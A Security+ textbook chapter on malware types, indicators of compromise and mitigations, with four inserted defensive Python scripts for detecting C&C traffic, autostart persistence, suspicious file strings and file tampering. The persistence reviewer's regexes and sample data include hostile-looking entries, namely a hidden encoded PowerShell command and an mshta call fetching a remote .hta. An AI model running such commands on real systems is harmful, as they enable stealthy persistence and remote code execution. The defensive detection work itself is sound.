
Chapter 3
Malicious Code

THE COMPTIA SECURITY+ EXAM OBJECTIVES COVERED IN THIS CHAPTER INCLUDE:

Domain 2.0: Threats, Vulnerabilities, and Mitigations
- 2.4. Given a scenario, analyze indicators of malicious activity.
  - Malware attacks (Ransomware, Trojan, Worm, Spyware, Bloatware, Virus, Keylogger, Logic bomb, Rootkit)

Malware comes in many forms, from ransomware and worms to spyware, viruses, keyloggers, and rootkits that help ensure that attackers can retain access to systems once they've gained a foothold. In this chapter, you will explore the various types of malware, as well as the distinguishing elements, behaviors, and traits of each malware type. You will learn about the indicators that you should look for, the response methods that organizations use to deal with each type of malware, and the controls that can help protect against them.

Malware

The term malware describes a wide range of software that is intentionally designed to cause harm to systems and devices, networks, or users. Malware can also gather information, provide illicit access, and take a broad range of actions that the legitimate owner of a system or network may not want to occur. The SY0-701 Security+ exam objectives include a number of the most common types of malware, and you will need to be familiar with each of them: how to tell them apart, how you can identify them, and the common techniques used in combating them.

Exam Note

This objective introduces many types of malware and asks you to analyze potential indicators to determine the type of attack. When you tackle malware-based questions, you will need to know the distinctive characteristics of each type of malware and what might help you tell them apart. For example, a Trojan is disguised as legitimate software, whereas ransomware is aimed at getting payment from a victim.
As you read this section, remember to pay attention to the differences between each type of malware, what common indicators of compromise are associated with them, and how you would answer questions about them on the exam!

Ransomware

Ransomware is malware that takes over a computer and then demands a ransom. There are many types of ransomware, including crypto malware, which encrypts files and then holds them hostage until a ransom is paid. Other ransomware techniques include threatening to report the user to law enforcement due to pirated software or pornography, or threatening to expose sensitive information or pictures from the victim's hard drive or device.

A significant portion of ransomware attacks are driven by phishing campaigns, with unsuspecting victims installing malware delivered via phishing emails or links in those emails. That's not the only way that ransomware is delivered, as malicious actors continue to use direct attack methods like Remote Desktop Protocol (RDP), vulnerable services, or front-facing applications that they can compromise.

Indicators of compromise (IoCs) for ransomware include, but are not limited to:
- Command and control (C&C) traffic and/or contact to known malicious IP addresses
- Use of legitimate tools in abnormal ways to retain control of the compromised system
- Lateral movement processes that seek to attack or gain information about other systems or devices inside the same trust boundaries
- Encryption of files
- Notices to end users of the encryption process with demands for ransom
- Data exfiltration behaviors, including large file transfers

You can read an example of a ransomware advisory provided by the U.S. Cybersecurity & Infrastructure Security Agency (CISA) about the Royal ransomware variant, including a detailed list of specific IoCs, at www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a.
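The IoC list above and the Bots, Botnets, and Command and Control section later in this chapter both describe network-side indicators: contact with known malicious IP addresses, IRC on port 6667, and large outbound transfers. The Python script below is an added example (not from the book or from any vendor tool) that applies those three checks to firewall-style connection records. The log format, the IP addresses (all from the TEST-NET documentation ranges), the watchlist, and the 500 MB exfiltration threshold are constructed for illustration.

```python
"""Flag ransomware / C&C network indicators in constructed connection logs.

Added example, not from the book: a small detector over firewall-style
connection records. The record format, the addresses, and the "known
malicious" watchlist are all constructed placeholders.
"""
from collections import defaultdict
from dataclasses import dataclass

# Constructed watchlist standing in for an IoC feed (e.g. a CISA advisory).
KNOWN_MALICIOUS_IPS = {"203.0.113.45", "198.51.100.7"}   # TEST-NET placeholders
IRC_PORTS = {6667}                    # classic IRC C&C port named in the chapter
EXFIL_BYTES_THRESHOLD = 500_000_000   # 500 MB to one external host: review as exfiltration


@dataclass(frozen=True)
class Conn:
    ts: str
    src: str
    dst: str
    dport: int
    bytes_out: int


def parse_line(line: str) -> Conn:
    """Parse one 'ts src dst dport bytes_out' record (constructed format)."""
    ts, src, dst, dport, bytes_out = line.split()
    return Conn(ts, src, dst, int(dport), int(bytes_out))


def is_internal(ip: str) -> bool:
    """Treat 10.0.0.0/8 and 192.168.0.0/16 as inside the trust boundary (simplified)."""
    return ip.startswith("10.") or ip.startswith("192.168.")


def detect(lines):
    """Return a sorted list of (src, indicator, detail) tuples for outbound traffic."""
    findings = set()
    outbound = defaultdict(int)   # (src, dst) -> total bytes sent to that external host
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        c = parse_line(line)
        if is_internal(c.dst):
            continue              # only traffic leaving the trust boundary is of interest here
        if c.dst in KNOWN_MALICIOUS_IPS:
            findings.add((c.src, "known-malicious-ip", c.dst))
        if c.dport in IRC_PORTS:
            findings.add((c.src, "irc-c2-port", f"{c.dst}:{c.dport}"))
        outbound[(c.src, c.dst)] += c.bytes_out
    for (src, dst), total in outbound.items():
        if total >= EXFIL_BYTES_THRESHOLD:
            findings.add((src, "large-outbound-transfer", f"{dst} {total} bytes"))
    return sorted(findings)


# Constructed sample: one workstation talks to a watchlisted host over IRC and
# pushes a large volume to another external address; the other records are benign.
SAMPLE_LOG = """\
# ts src dst dport bytes_out
2024-05-01T09:00:01 10.0.0.15 192.168.1.10 445 120000
2024-05-01T09:00:05 10.0.0.15 203.0.113.45 6667 900
2024-05-01T09:00:09 10.0.0.15 203.0.113.45 6667 1200
2024-05-01T09:02:00 10.0.0.15 198.51.100.200 443 300000000
2024-05-01T09:02:30 10.0.0.15 198.51.100.200 443 250000000
2024-05-01T09:03:00 10.0.0.22 198.51.100.9 443 4500
"""


def run_sample():
    return detect(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for src, indicator, detail in run_sample():
        print(f"{src}\t{indicator}\t{detail}")
```

In practice the watchlist is loaded from an IoC feed and the byte threshold is tuned to what is normal for the network segment; the point of the script is that it keys off traffic crossing the trust boundary, which is where all three of these ransomware indicators become visible.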
One of the most important defenses against ransomware is an effective backup system that stores files in a separate location that will not be impacted if the system or device it backs up is infected and encrypted by ransomware. Organizations that are preparing to deal with ransomware need to determine what their response will be; in some cases, paying ransoms has resulted in files being returned, and in others attackers merely demanded more money. Some ransomware has been defeated, and defenders may be able to use a preexisting decryption tool to restore files. Antivirus and antimalware providers, as well as others in the security community, provide anti-ransomware tools.

Trojans

Trojans, or Trojan horses, are a type of malware that is typically disguised as legitimate software. They are called Trojan horses because they rely on unsuspecting individuals running them, thus providing attackers with a path into a system or device. Figure 3.1 shows an example of a Trojan infection path, starting with a user downloading an apparently legitimate application from the Android app store and proceeding through automated download of malicious add-ons to remote control of the device.

FIGURE 3.1 Trojan application download and infection process

An example of this type of malware is the Triada Trojan, which is often distributed in the guise of a modified, feature-enhanced WhatsApp version. When the application is launched, the Trojan gathers information about the host device, including device IDs, subscriber IDs, and the device's hardware address. This information is used to register the device with a remote server. With that information ready, the Trojan is downloaded, decrypted, and run, allowing further actions to take place depending on what the malicious actor wants to occur. Those activities include everything from displaying ads to signing up for paid subscriptions to services.
Indicators of compromise for Trojans often include:
- Signatures for the specific malware applications or downloadable files
- Command and control system hostnames and IP addresses
- Folders or files created on target devices

A full write-up about the Triada Trojan that was deployed via modified WhatsApp versions can be found at https://securelist.com/triada-trojan-in-whatsapp-mod/103679, and additional detail can be found at https://securelist.com/malicious-whatsapp-mod-distributed-through-legitimate-apps/107690.

In addition to traditional Trojans, remote access Trojans (RATs) provide attackers with remote access to systems. Some legitimate remote access tools are used as RATs, which can make it difficult to identify whether a tool is a legitimate remote support tool or a tool being used for remote access by an attacker. Antimalware tools may also cause false positives when they find remote access tools that may be used as RATs, but disabling this detection can then result in RATs not being detected.

Security practitioners often combat Trojans and RATs using a combination of security awareness training, to encourage users not to download untrusted software, and antimalware or endpoint detection and response (EDR) tools that detect Trojan and RAT-like behavior and known malicious files. Mitigation practices for Trojans typically start with awareness practices that help ensure that downloading and running Trojans is less likely. Controlling the software and applications that users can acquire can be a helpful option in many cases, but is often balanced with the need to allow flexibility for users. Antimalware, EDR, and other tools that identify and stop malicious software from running, or that can discover it based on behavior and stop it, are also commonly used as a final line of defense.

Bots, Botnets, and Command and Control

Many types of malware use command and control (C&C) techniques and systems to allow attackers to tell them what to do.
These groups of systems that are under central command are called botnets, and the individual systems are called bots. C&C increasingly uses encrypted HTTP connections to a frequently changing set of remote hosts in an attempt to avoid observation, but Internet Relay Chat (IRC) via port 6667 and similar techniques remain popular too. As a defender, you'll need to know how to search for C&C communications and to recognize that a system reaching out to unknown hosts may be a sign that a system you're responsible for is part of a botnet.

Worms

Unlike Trojans, which require user interaction, worms spread themselves. While worms are often associated with spreading via attacks on vulnerable services, any type of spread via automated means is possible, meaning that worms can spread via email attachments, network file shares, vulnerable devices like IoT (Internet of Things) devices and phones, or other methods as well. Worms also self-install, rather than requiring users to click on them, making them quite dangerous.

Stuxnet: Nation-State-Level Worm Attacks

The 2010 Stuxnet attack is generally recognized as the first implementation of a worm as a cyber weapon. The worm was aimed at the Iranian nuclear program, and copied itself to thumb drives to bypass the air gap around its target computers (physically separated systems without a network connection). Stuxnet took advantage of a number of advanced techniques for its time, including using a trusted digital certificate, searching for specific industrial control systems (ICSs) that were known to be used by the Iranian nuclear program, and specific programming to attack and damage centrifuges while providing false monitoring data to controllers to ensure that the damage would not be noticed until it was too late. While Stuxnet was specifically designed to bypass physically separated networks, firewalls and network-level controls remain one of the best ways to mitigate worm attacks.
If compromised devices cannot communicate with other vulnerable devices, the infection can't spread! You can read about Stuxnet in more depth at www.wired.com/2014/11/countdown-to-zero-day-stuxnet and https://spectrum.ieee.org/the-real-story-of-stuxnet.

An example of a modern worm is Raspberry Robin, a worm that is used as part of pre-ransomware activity. Raspberry Robin initially spread through infected USB drives using a malicious LNK (shortcut) file. Once running, it uses built-in Windows tools to accomplish further tasks and to obtain persistence, ensuring it will survive past reboots. Common IoCs for worms like Raspberry Robin include:
- Known malicious files
- Downloads of additional components from remote systems
- Command and control contact to remote systems
- Malicious behaviors using system commands for injection and other activities, including use of cmd.exe, msiexec.exe, and others
- Hands-on-keyboard attacker activity

Microsoft provides a detailed write-up of the Raspberry Robin worm, including recommendations for defensive actions to be taken, at www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity.

Mitigating worm infections frequently starts with effective network-level controls focused on preventing infection traffic. Firewalls, IPS devices, network segmentation, and similar controls are the first layer of defense. Patching and configuring services to limit attack surfaces is also a best practice for preventing worms. After an infection, responses may include use of antimalware, EDR, and similar tools to stop and potentially remove infections. Depending on the complexity of the malware, removal may be nearly impossible, and, as with many types of malware, reinstallation or resetting to original firmware may be required for some devices.

Spyware

Spyware is malware that is designed to obtain information about an individual, organization, or system.
Various types of spyware exist, with different types of information targeted by each. Many spyware packages track users' browsing habits, installed software, or similar information and report it back to central servers. Some spyware is relatively innocuous, but malicious spyware exists that targets sensitive data, allows remote access to web cameras, or otherwise provides illicit or undesirable access to the systems it is installed on. Spyware is associated with identity theft and fraud, advertising and redirection of traffic, digital rights management (DRM) monitoring, and stalkerware, a type of spyware used to illicitly monitor partners in relationships.

Spyware is most frequently combated using antimalware tools, although user awareness can help prevent the installation of spyware that is bundled into installers for other software (thus acting as a form of Trojan), or that arrives through other means where spyware may appear to be a useful tool or innocuous utility.

Spyware comes in many forms, which means that its IoCs can be very similar to those of other malicious software types. Common examples of spyware IoCs include:
- Remote-access and remote-control-related indicators
- Known software file fingerprints
- Malicious processes, often disguised as system processes
- Injection attacks against browsers

Since spyware uses techniques from other types of malware, defining software as spyware typically requires understanding its use and motivations rather than just its behavior. Thus, spyware may use Trojan, worm, or virus-style propagation methods in some cases, but the intent is to gather information about a user or system, with the methods used being less important than the goal. Mitigation practices for spyware focus on awareness, control of the software that is allowed on devices and systems, and antispyware capabilities built into antimalware tools.
Since spyware is generally perceived as less of a threat than many types of malware, it is commonly categorized separately and may require specific configuration to identify and remove it. An example of a commercialized spyware tool is NSO Group's Pegasus. Amnesty International provides a thorough write-up of indicators and actions taken by Pegasus at www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus.

Bloatware

If you have ever purchased a new computer and discovered preinstalled applications that you didn't want on it, you've encountered bloatware. The term bloatware is an all-encompassing term used to describe unwanted applications installed on systems by manufacturers. They may be part of a commercial relationship the manufacturer has, they may be programs the manufacturer itself provides, or they may come later as part of installer packages for other applications.

Unlike the other malicious software categories listed in this chapter, bloatware isn't usually intentionally malicious. It may, however, be poorly written, may call home with information about your system or usage, or may prove to be vulnerable to exploitation, adding another attack surface to otherwise secure devices. Uninstalling bloatware or using a clean operating system image are common practices for organizations as well as individuals.

Since bloatware isn't really malicious software, it isn't typically associated with IoCs. Instead, it should simply be removed to prevent issues, including taking up disk space, memory, and CPU cycles without providing any benefit. Mitigation techniques for bloatware focus on awareness and uninstallation or removal of the software.

Exam Note

The Security+ exam outline calls out spyware and bloatware, but they can sometimes be difficult to tell apart, since manufacturers who install bloatware often have call-home functionality built into the bloatware.
The key differentiator is that spyware's primary intention is to gather information about the user, their use of the system and Internet, and the configuration of the system, whereas bloatware is simply unwanted programs.

Viruses

Computer viruses are malicious programs that self-copy and self-replicate once they are activated. Unlike worms, they don't spread themselves via vulnerable services and networks. Viruses require one or more infection mechanisms that they use to spread themselves, like copying to a thumb drive or network share, and that mechanism is typically paired with some form of search capability to find new places to spread to once they are run. Viruses also typically have both a trigger, which sets the conditions for when the virus will execute, and a payload, which is what the virus does or delivers, or the actions it performs. Viruses come in many varieties, including:
- Memory-resident viruses, which remain in memory while the system or device is running
- Non-memory-resident viruses, which execute, spread, and then shut down
- Boot sector viruses, which reside inside the boot sector of a drive or storage media
- Macro viruses, which use macros or code inside word processing software or other tools to spread
- Email viruses, which spread via email either as email attachments or as part of the email itself using flaws inside email clients

Fileless virus attacks are similar to traditional viruses in a number of critical ways. They spread via methods like spam email and malicious websites and exploit flaws in browser plug-ins and web browsers themselves. Once they successfully find a way into a system, they inject themselves into memory and conduct further malicious activity, including adding the ability to reinfect the system via the same process at reboot through a Registry entry or other technique.
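Because the Registry-based persistence just described is often the only on-disk artifact of a fileless infection, reviewing autostart entries is one place where such an infection becomes visible. The script below is an added example (not from the book) that applies a few heuristics to Run and RunOnce values: encoded or hidden-window PowerShell, script hosts launching remote content, and launchers living in temporary folders. The export format (`key | name | data`) and every entry in it are constructed; on a live Windows host the same rules could be applied to `reg query` output (an assumption, not shown here).

```python
"""Review Run/RunOnce autostart values for fileless-style persistence.

Added example, not from the book. Input is a constructed text export of
value names and data so the script runs anywhere; the heuristics flag script
hosts being launched in ways that ordinary installers rarely use.
"""
import re

AUTOSTART_KEYS = (
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run",
)

# Each rule is (name, regex over the value data).
RULES = [
    ("encoded-powershell", re.compile(r"powershell[^|]*\s-(e|ec|enc|encodedcommand)\b", re.I)),
    ("hidden-window",      re.compile(r"-w(indowstyle)?\s+hidden", re.I)),
    ("download-cradle",    re.compile(r"(downloadstring|invoke-webrequest|iwr|wget|curl)\s*\(?\s*['\"]?https?://", re.I)),
    ("script-host-lolbin", re.compile(r"\b(mshta|wscript|cscript|regsvr32|rundll32)(\.exe)?\b.*\b(javascript:|vbscript:|https?://)", re.I)),
    ("temp-path-launcher", re.compile(r"(%temp%|\\appdata\\local\\temp\\|\\users\\public\\)", re.I)),
]


def parse_export(text):
    """Parse constructed 'KEY | NAME | DATA' lines into (key, name, data) tuples."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        key, name, data = (part.strip() for part in line.split("|", 2))
        entries.append((key, name, data))
    return entries


def review(entries):
    """Return {value_name: [matched rule names]} for autostart entries that trip a rule."""
    prefixes = tuple(k.upper() for k in AUTOSTART_KEYS)
    hits = {}
    for key, name, data in entries:
        if not key.upper().startswith(prefixes):
            continue                      # only the autostart locations are in scope
        matched = [rule for rule, rx in RULES if rx.search(data)]
        if matched:
            hits[name] = matched
    return hits


# Constructed sample export: two ordinary vendor entries, two suspicious ones,
# and one entry outside the autostart keys that must be ignored. The
# base64 blob is a placeholder, not a real encoded command.
SAMPLE_EXPORT = r"""
# key | value name | data
HKLM\Software\Microsoft\Windows\CurrentVersion\Run | SecurityHealth | %windir%\system32\SecurityHealthSystray.exe
HKCU\Software\Microsoft\Windows\CurrentVersion\Run | OneDrive | "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
HKCU\Software\Microsoft\Windows\CurrentVersion\Run | Updater | powershell.exe -w hidden -enc UGxhY2Vob2xkZXI=
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce | svc | mshta.exe http://198.51.100.7/x.hta
HKCU\Software\Other\NotAutostart | Something | powershell -enc UGxhY2Vob2xkZXI=
"""


def run_sample():
    return review(parse_export(SAMPLE_EXPORT))


if __name__ == "__main__":
    for name, rules in run_sample().items():
        print(f"{name}: {', '.join(rules)}")
```

These rules are deliberately narrow so that the vendor entries produce no noise; a real deployment would extend the key list to the Winlogon, Services, and scheduled-task locations and feed the hits into EDR or SIEM rather than printing them.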
At no point do they require local file storage, as they remain memory resident throughout their entire active life; in fact, the only stored artifact of many fileless attacks would be the artifacts of their persistence techniques, like the Registry entry shown in Figure 3.2.

FIGURE 3.2 Fileless virus attack chain

As you might expect from the infection flow diagram in Figure 3.2, fileless attacks require a vulnerability to succeed, so ensuring that browsers, plug-ins, and other software that might be exploited by attackers are up to date and protected can prevent most attacks. Using antimalware tools that can detect unexpected behavior from scripting tools like Microsoft PowerShell can also help stop fileless viruses. Finally, network-level defenses like intrusion prevention systems (IPSs), as well as reputation-based protection systems, can prevent potentially vulnerable systems from browsing known malicious sites.

IoCs related to viruses are often available in threat feeds from organizations like VirusTotal, where recently discovered viruses and their behaviors are analyzed and indexed to create IoC feeds. You can find examples of VirusTotal's crowdsourced YARA rules in their support article about their community YARA feed dashboard at https://support.virustotal.com/hc/en-us/articles/9853517705117-Crowdsourced-YARA-rules-dashboard.

Mitigation for viruses includes both awareness that helps to prevent users from clicking on and activating viruses and antimalware tools that can detect them and stop them on disk, in memory, or as they are being executed. Removal varies, with some viruses easy to remove using antimalware tools or dedicated, virus-specific utilities, while others may require more significant action.

Removing malware can be a challenging task. It can be nearly impossible to determine if every part of a complex infection has been removed.
Although it may be tempting to rely on your antivirus or other security tools to remove the infection, that often isn't sufficient. Due to this, many organizations have a standard practice of wiping the drive of an infected machine and restoring it from a known good backup or reinstalling/reimaging it. While there are some scenarios where even that won't be enough, such as with BIOS/UEFI-resident malware, in most common scenarios a complete wipe and reinstallation or reimaging will ensure the malware is gone.

Keyloggers

Keyloggers are programs that capture keystrokes from a keyboard, although keylogger applications may also capture other input such as mouse movement, touchscreen inputs, or credit card swipes from attached devices. Keyloggers work in a multitude of ways, ranging from tools that capture data from the kernel, via APIs or scripts, or even directly from memory. Regardless of how they capture data, the goal of a keylogger is to capture user input to be analyzed and used by an attacker.

Preventing software keylogging typically focuses on normal security best practices to ensure that malware containing a keylogger is not installed, including patching and systems management, as well as use of antimalware tools. Since many keyloggers are aimed at acquiring passwords, use of multifactor authentication can help limit the impact of a keylogger, even if it cannot defeat the keylogger itself. In more complex security environments where underlying systems cannot be trusted, use of bootable USB drives can prevent use of a potentially compromised underlying operating system.

Much like other malicious software intended to gather information, IoCs related to keyloggers are commonly:
- File hashes and signatures
- Exfiltration activity to command and control systems
- Process names
- Known reference URLs

An example of an analysis of a keylogger delivery campaign via PDFs can be found at www.socinvestigation.com/pdf-campaign-delivering-snake-keylogger.
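Several of the IoC lists in this chapter (keyloggers here, and Trojans, viruses, and rootkits elsewhere) lead with file hashes and reference URLs, and the Analyzing Malware section that follows recommends strings for recovering such artifacts. The Python script below is an added example, not from the book, that performs that first-pass static triage: it hashes a file, extracts ASCII and UTF-16LE strings the way `strings -a` and `strings -el` would, pulls URLs, IP addresses, and hostnames out of them, and compares the SHA-256 against a watchlist. The sample bytes (which embed two real Windows API names commonly seen in keyloggers, GetAsyncKeyState and SetWindowsHookExA), the addresses, and the watchlist are all constructed.

```python
"""Static triage of a suspect file: hashes, printable strings, IoC extraction.

Added example, not from the book. The sample bytes and the watchlist are
constructed placeholders; the logic is what an analyst does by hand with
sha256sum and strings before submitting a hash to a service like VirusTotal.
"""
import hashlib
import re

MIN_STRING_LEN = 6
# Last labels that mark a file name rather than a hostname (e.g. kernel32.dll).
FILE_EXTS = {"dll", "exe", "sys", "pdb", "log", "dat", "txt", "php", "ini"}

URL_RX = re.compile(r"https?://[\w.\-]+(?::\d+)?(?:/[\w./\-?=&%]*)?")
IPV4_RX = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_RX = re.compile(r"\b[a-z0-9](?:[a-z0-9\-]{0,61}[a-z0-9])?(?:\.[a-z0-9\-]+)+\b", re.I)


def hashes(data: bytes) -> dict:
    """MD5/SHA-1/SHA-256 as most feeds and sandboxes report them."""
    return {
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def extract_strings(data: bytes, min_len: int = MIN_STRING_LEN):
    """Printable ASCII runs plus UTF-16LE runs (Windows binaries store many strings wide)."""
    ascii_runs = re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)
    wide_runs = re.findall(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data)
    found = [s.decode("ascii") for s in ascii_runs]
    found += [s.decode("utf-16le") for s in wide_runs]
    return found


def extract_iocs(strings):
    """Pull URLs, IPv4 addresses, and bare hostnames out of recovered strings."""
    urls, ips, hosts = set(), set(), set()
    for s in strings:
        urls.update(URL_RX.findall(s))
        ips.update(IPV4_RX.findall(s))
        # Mask URLs first so their host part is not double-counted, then skip file names.
        for h in HOST_RX.findall(URL_RX.sub(" ", s)):
            if IPV4_RX.fullmatch(h) or h.rsplit(".", 1)[-1].lower() in FILE_EXTS:
                continue
            hosts.add(h.lower())
    return {"urls": sorted(urls), "ips": sorted(ips), "hosts": sorted(hosts)}


def triage(data: bytes, watchlist_sha256) -> dict:
    """Hash, string-dump, and IoC-extract one file; flag it if its SHA-256 is watchlisted."""
    h = hashes(data)
    strs = extract_strings(data)
    return {
        "hashes": h,
        "strings": strs,
        "iocs": extract_iocs(strs),
        "known_bad": h["sha256"] in watchlist_sha256,
    }


# Constructed sample "binary": a fake DOS header, two hooking/keyboard API names,
# an ASCII upload URL, a UTF-16LE mail host, and a log file name. TEST-NET address.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"kernel32.dll\x00GetAsyncKeyState\x00SetWindowsHookExA\x00"
    + b"http://198.51.100.7/upload.php\x00\x00"
    + "smtp.mail-relay.example".encode("utf-16le") + b"\x00\x00"
    + b"\x00" * 6 + b"keys.log\x00"
)

# Constructed watchlist: pretend a threat feed already lists this sample's SHA-256.
WATCHLIST_SHA256 = {hashlib.sha256(SAMPLE).hexdigest()}


def run_sample():
    return triage(SAMPLE, WATCHLIST_SHA256)


if __name__ == "__main__":
    report = run_sample()
    print(report["hashes"]["sha256"], "known_bad =", report["known_bad"])
    print("strings:", report["strings"])
    print("iocs:", report["iocs"])
```

A hash hit is the cheapest possible verdict but only works for samples a feed has already seen; the recovered API names, URL, and mail host are what an analyst would carry into a sandbox run or a YARA rule when the hash is unknown.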
In addition to the software-based keyloggers we discussed here, hardware keyloggers are also available and inexpensive. The authors of this book have encountered them on college campuses, where students tried (and in some cases succeeded) to acquire their instructors' credentials so that they could change their grades.

Logic Bombs

Logic bombs, unlike the other types of malware described here, are not independent malicious programs. Instead, they are functions or code placed inside other programs that will activate when set conditions are met. Some other types of malware may use this type of code as part of their function as well. While relatively rare compared to other types of malware, logic bombs are a consideration in software development and systems management, and can have a significant impact if they successfully activate. Since logic bombs are found in code, IoCs for logic bombs are less common; they require analysis of the code or logic in the application, meaning that mitigation processes are also primarily focused on code review.

Analyzing Malware

A number of techniques are commonly used to analyze malware:
- Online analysis tools like VirusTotal can be used to check whether the malware is a known tool and to see what it is identified as by multiple AV tools.
- Sandbox tools can be used to analyze malware behavior in a protected environment.
- Manual code analysis is common, particularly with scripts and interpreted code like Python and Perl.
- Malware can be analyzed using tools like strings to look for recoverable artifacts that may be useful for the analysis.

Many other tools and techniques are used to analyze malicious code and software, but these are a good starting point for security analysts who need to determine whether a given executable or block of code might be malicious.

Rootkits

Rootkits are malware that is specifically designed to allow attackers to access a system through a backdoor.
Many modern rootkits also include capabilities that work to conceal the rootkit from detection through any of a variety of techniques, ranging from hooking filesystem drivers to ensure that users cannot see the rootkit files, to infecting startup code in the Master Boot Record (MBR) of a disk, allowing attacks against full-disk encryption systems.

Rootkit detection can be challenging, because a system infected with malware like this cannot be trusted. That means that the best way to detect a rootkit is to test the suspected system from a trusted system or device. In cases where that isn't possible, rootkit detection tools look for behaviors and signatures that are typical of rootkits. Techniques like integrity checking and data validation against expected responses can also be useful for rootkit detection, and anti-rootkit tools often use a combination of these techniques to detect complex rootkits.

Once a rootkit is discovered, removal can be challenging. While some antimalware and anti-rootkit tools are able to remove specific rootkits, the most common recommendation whenever possible is to rebuild the system or to restore it from a known good backup. As virtual machines, containers, system imaging, and software-defined environments have become more common, restoration processes have become simpler, and in many cases restoration may be as fast as, or faster than, ensuring that a system infected with a rootkit has been properly and fully cleaned.

Some rootkits are intentionally installed, either as part of DRM systems or as part of anti-cheating toolkits for games, or because they are part of a tool used to defeat copy protection mechanisms. While these tools are technically rootkits, you will normally be focused on tools used by malicious actors instead of intentional installation for purposes like these.
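Integrity checking and examining a suspect system from a trusted one, both recommended above, come down to comparing what is on disk now against a baseline recorded when the system was known good. The script below is an added example (not from the book) that builds a SHA-256 baseline of a directory tree and later reports modified, added, and removed files. The demo tree, the tampering it simulates, and the file names are constructed; the key assumption is that the baseline is stored off the suspect host and the verify step runs from a clean boot medium or with the drive mounted on another system, so a rootkit's filesystem hooks cannot hide the changes from the check.

```python
"""Build and verify a file-integrity baseline (added example, not from the book).

build_baseline() records SHA-256 hashes for every regular file under a root;
verify() compares the current tree against a saved baseline. The demo uses a
temporary directory and simulates a tampered binary, a dropped file, and a
deleted file; all of it is constructed.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    """Stream the file through SHA-256 so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map relative POSIX path -> sha256 for every regular (non-symlink) file under root."""
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            baseline[p.relative_to(root).as_posix()] = sha256_file(p)
    return baseline


def verify(root: Path, baseline: dict) -> dict:
    """Compare the tree against the baseline; return modified/added/removed path lists."""
    current = build_baseline(root)
    return {
        "modified": sorted(f for f in baseline if f in current and current[f] != baseline[f]),
        "added": sorted(f for f in current if f not in baseline),
        "removed": sorted(f for f in baseline if f not in current),
    }


def demo() -> dict:
    """Constructed scenario: baseline a tiny 'system' tree, then simulate tampering."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "bin" / "ls").write_bytes(b"original ls binary")
        (root / "etc").mkdir()
        (root / "etc" / "hosts").write_bytes(b"127.0.0.1 localhost\n")

        # The baseline would be written somewhere the suspect host cannot reach.
        baseline_json = json.dumps(build_baseline(root), indent=1)

        # Simulated changes of the kind a rootkit install leaves behind: a replaced
        # system binary, a new loadable-module-like file, and a removed file.
        (root / "bin" / "ls").write_bytes(b"replaced ls binary")
        (root / "lib").mkdir()
        (root / "lib" / "hidden.ko").write_bytes(b"constructed placeholder")
        (root / "etc" / "hosts").unlink()

        return verify(root, json.loads(baseline_json))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Running the verify step against a live, possibly hooked kernel defeats the purpose: the same code only gives a trustworthy answer when the filesystem is read by an operating system the rootkit does not control, which is exactly the offline-analysis advice the chapter gives.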
Like many of the other malware types, the best way to prevent rootkits is to use normal security practices, including patching, use of secure configurations, and ensuring that privilege management is used. Tools like Secure Boot and techniques that can validate live systems and files can also be used to help prevent rootkits from being successfully installed or remaining resident. Common IoCs for rootkits include:
- File hashes and signatures
- Command and control domains, IP addresses, and systems
- Behavior-based identification like the creation of services, executables, configuration changes, file access, and command invocation
- Opening ports or creation of reverse proxy tunnels

An example of a rootkit used on automatic teller machines (ATMs), with example indicators, can be found at www.socinvestigation.com/unc2891-atm-rootkit-mandiant-advanced-practices-team-tracks-latest-indicators.

Since rootkits are specifically designed to avoid detection, mitigation can be particularly challenging. While antimalware and similar tools can sometimes gain an edge in detecting rootkits, detection and removal can be difficult to ensure. Preventing rootkits from being installed by taking proactive action to secure systems and prevent malicious activity is a key element of rootkit mitigation.

Since rootkits often invade operating systems and use hooks to make the operating system help hide them, one technique that can help to find them is to remove the drive and connect it to another system. This means that the infected operating system won't be running and that the tool may be revealed. Similar techniques can be accomplished through system images or snapshots of virtual machines.

Summary

Security professionals need to be aware of the most common forms of malware. This includes understanding how to identify common indicators of malicious activity related to malware attacks and malware itself. The Security+ exam objectives focus on a few different types of malware.
These include ransomware, which most frequently targets victims by encrypting files and holding them for ransoms paid via cryptocurrency. Trojans are malware that is disguised to look like legitimate software but that takes malicious action once downloaded and run. Worms are malware that spread themselves on networks via vulnerable services, email, or file shares. Viruses are similar but only infect local systems and often require user action, like running an application, to infect a system.

Spyware is malicious software that is intended to gather information about users, systems, and networks. It then sends that information back to remote systems or command and control servers. Keyloggers are a specialized type of spyware that capture keystrokes, allowing malicious actors to know what you've typed. Keyloggers exist in both software and hardware form, although the Security+ exam focuses on them as malware.

Rootkits are used to retain access to a system and are commonly part of an attacker's toolkit, as well as being used together with other malware to help keep a foothold on a compromised system. Rootkits are designed to conceal malicious action and to counter protective measures like antivirus, antimalware, and endpoint detection and response tools. Logic bombs are code that executes under a specific condition or conditions, taking unwanted action. Unlike the other malware on this list, logic bombs typically need to be identified by reviewing source code or scripts.

